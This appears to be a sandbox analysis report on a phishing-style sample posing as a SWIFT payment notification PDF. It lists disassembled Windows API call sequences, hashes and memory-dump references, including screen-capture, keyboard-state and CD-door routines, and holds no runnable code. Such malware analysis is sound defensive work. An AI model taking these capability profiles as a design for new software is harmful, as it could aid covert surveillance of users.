                                                                                                                              • Opcode ID: 5de70b745d60c46cef08f56f1a5c3a55b51ac4f0ed049d1ad5198b842cd33ee8
                                                                                                                              • Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
                                                                                                                              • Opcode Fuzzy Hash: 5de70b745d60c46cef08f56f1a5c3a55b51ac4f0ed049d1ad5198b842cd33ee8
                                                                                                                              • Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
                                                                                                                              APIs
                                                                                                                              • GetDC.USER32(00000000), ref: 0043143E
                                                                                                                              • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                                                                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                                                                                                                              • SelectObject.GDI32(00000000,?), ref: 00431466
                                                                                                                              • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                                                                                                                              • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                                                                                              • String ID: (
                                                                                                                              • API String ID: 3300687185-3887548279
                                                                                                                              • Opcode ID: 44b2a6cc1311bb1c9d10b6a562886f84764491f33aaae71afd7602fb15c6dd8c
                                                                                                                              • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                                                                                                                              • Opcode Fuzzy Hash: 44b2a6cc1311bb1c9d10b6a562886f84764491f33aaae71afd7602fb15c6dd8c
                                                                                                                              • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                                                                                              • GetDriveTypeW.KERNEL32 ref: 0045DB32
                                                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                                                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                                                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: SendString$BuffCharDriveLowerType
                                                                                                                              • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                              • API String ID: 1600147383-4113822522
                                                                                                                              • Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                                                                                              • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                                                                                                                              • Opcode Fuzzy Hash: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                                                                                              • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                                                                                                                              APIs
                                                                                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                                                                                                                              • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 004300F6
                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00430113
                                                                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                                                                                                                              • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00430150
                                                                                                                              • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                                                                                                                              • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                                                                                                                              • DeleteObject.GDI32(?), ref: 004301D0
                                                                                                                              • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3969911579-0
                                                                                                                              • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                                                                                              • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                                                                                                                              • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                                                                                              • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                                                                                                                              • String ID: 0
                                                                                                                              • API String ID: 956284711-4108050209
                                                                                                                              • Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                                                                                              • Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
                                                                                                                              • Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                                                                                              • Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
                                                                                                                              APIs
                                                                                                                              • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                                                                                                                              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                                                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                                                                                                                              • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                                                                                                                              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                                                                                                                              • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: SendString
                                                                                                                              • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                              • API String ID: 890592661-1007645807
                                                                                                                              • Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                                                                                              • Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
                                                                                                                              • Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                                                                                              • Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
                                                                                                                              APIs
                                                                                                                              • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                                                                                                                              • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                                                                                                                              • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                                                                                                                              • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                                                                                                                              • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                                                                                                                              • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                                                                                                                              • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                                                                                                                              • SendMessageW.USER32(?,00000402,?), ref: 00449399
                                                                                                                              • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                                                                                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$CharNext
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1350042424-0
                                                                                                                              • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                                                                                              • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                                                                                                                              • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                                                                                              • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                                                                                                                              APIs
                                                                                                                              • timeGetTime.WINMM ref: 00443B67
                                                                                                                                • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                                                                                                                              • Sleep.KERNEL32(0000000A), ref: 00443B9F
                                                                                                                              • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00443BC8
                                                                                                                              • SetActiveWindow.USER32(00000000), ref: 00443BEC
                                                                                                                              • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                                                                                                                              • SendMessageW.USER32(00000000,00000010,00000000,00000000), ref: 00443C22
                                                                                                                              • Sleep.KERNEL32(000000FA), ref: 00443C2D
                                                                                                                              • IsWindow.USER32(00000000), ref: 00443C3A
                                                                                                                              • EndDialog.USER32(00000000,00000000), ref: 00443C4C
                                                                                                                                • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                                                                                                • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                                                                                                • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                                                                                              • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                                                                                                                              • String ID: BUTTON
                                                                                                                              • API String ID: 1834419854-3405671355
                                                                                                                              • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                                                                                              • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
                                                                                                                              • Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                                                                                              • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
                                                                                                                              APIs
                                                                                                                              • GetKeyboardState.USER32(?), ref: 00453CE0
                                                                                                                              • SetKeyboardState.USER32(?), ref: 00453D3B
                                                                                                                              • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                                                                                                                              • GetKeyState.USER32(000000A0), ref: 00453D75
                                                                                                                              • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                                                                                                                              • GetKeyState.USER32(000000A1), ref: 00453DB5
                                                                                                                              • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                                                                                                                              • GetKeyState.USER32(00000011), ref: 00453DEF
                                                                                                                              • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                                                                                                                              • GetKeyState.USER32(00000012), ref: 00453E26
                                                                                                                              • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                                                                                                                              • GetKeyState.USER32(0000005B), ref: 00453E5D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: State$Async$Keyboard
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 541375521-0
                                                                                                                              • Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                                                                                              • Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
                                                                                                                              • Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                                                                                              • Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
                                                                                                                              APIs
                                                                                                                              • GetDlgItem.USER32(?,00000001), ref: 004357DB
                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 004357ED
                                                                                                                              • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                                                                                                                              • GetDlgItem.USER32(?,00000002), ref: 0043586A
                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 0043587C
                                                                                                                              • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 004358EE
                                                                                                                              • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                                                                                                                              • GetDlgItem.USER32(?,000003EA), ref: 00435941
                                                                                                                              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3096461208-0
                                                                                                                              • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                                                                                              • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                                                                                                                              • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                                                                                              • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                                                                                                                              APIs
                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 004714DC
                                                                                                                              • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                                                                                                                              • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                                                                                                                              • DeleteObject.GDI32(?), ref: 0047151E
                                                                                                                              • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
                                                                                                                              • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                                                                                                                              • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                                                                                                                              • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                                                                                                                              • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
                                                                                                                              • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                                                                                                                              • DeleteObject.GDI32(?), ref: 004715EA
                                                                                                                              • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3218148540-0
                                                                                                                              • Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                                                                                              • Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
                                                                                                                              • Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                                                                                              • Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
                                                                                                                              APIs
                                                                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 00461678
                                                                                                                              • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00461794
                                                                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 00461811
                                                                                                                              • GetDlgCtrlID.USER32(?), ref: 00461869
                                                                                                                              • GetWindowRect.USER32(?,?), ref: 004618A4
                                                                                                                              • GetParent.USER32(?), ref: 004618C3
                                                                                                                              • ScreenToClient.USER32(00000000), ref: 004618CA
                                                                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 00461941
                                                                                                                              • GetWindowTextW.USER32(?,?,00000400), ref: 0046197E
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout
                                                                                                                              • String ID: %s%u
                                                                                                                              • API String ID: 1412819556-679674701
                                                                                                                              • Opcode ID: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                                                                                              • Instruction ID: 362d1c13b2509f288ecdbc272899e32e1bd8f20a7ba75cfa55bfcaf2deda5cb5
                                                                                                                              • Opcode Fuzzy Hash: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                                                                                              • Instruction Fuzzy Hash: 1DA1B2715043019FDB10DF55C884BAB73A8FF84314F08896EFD899B255E738E94ACBA6
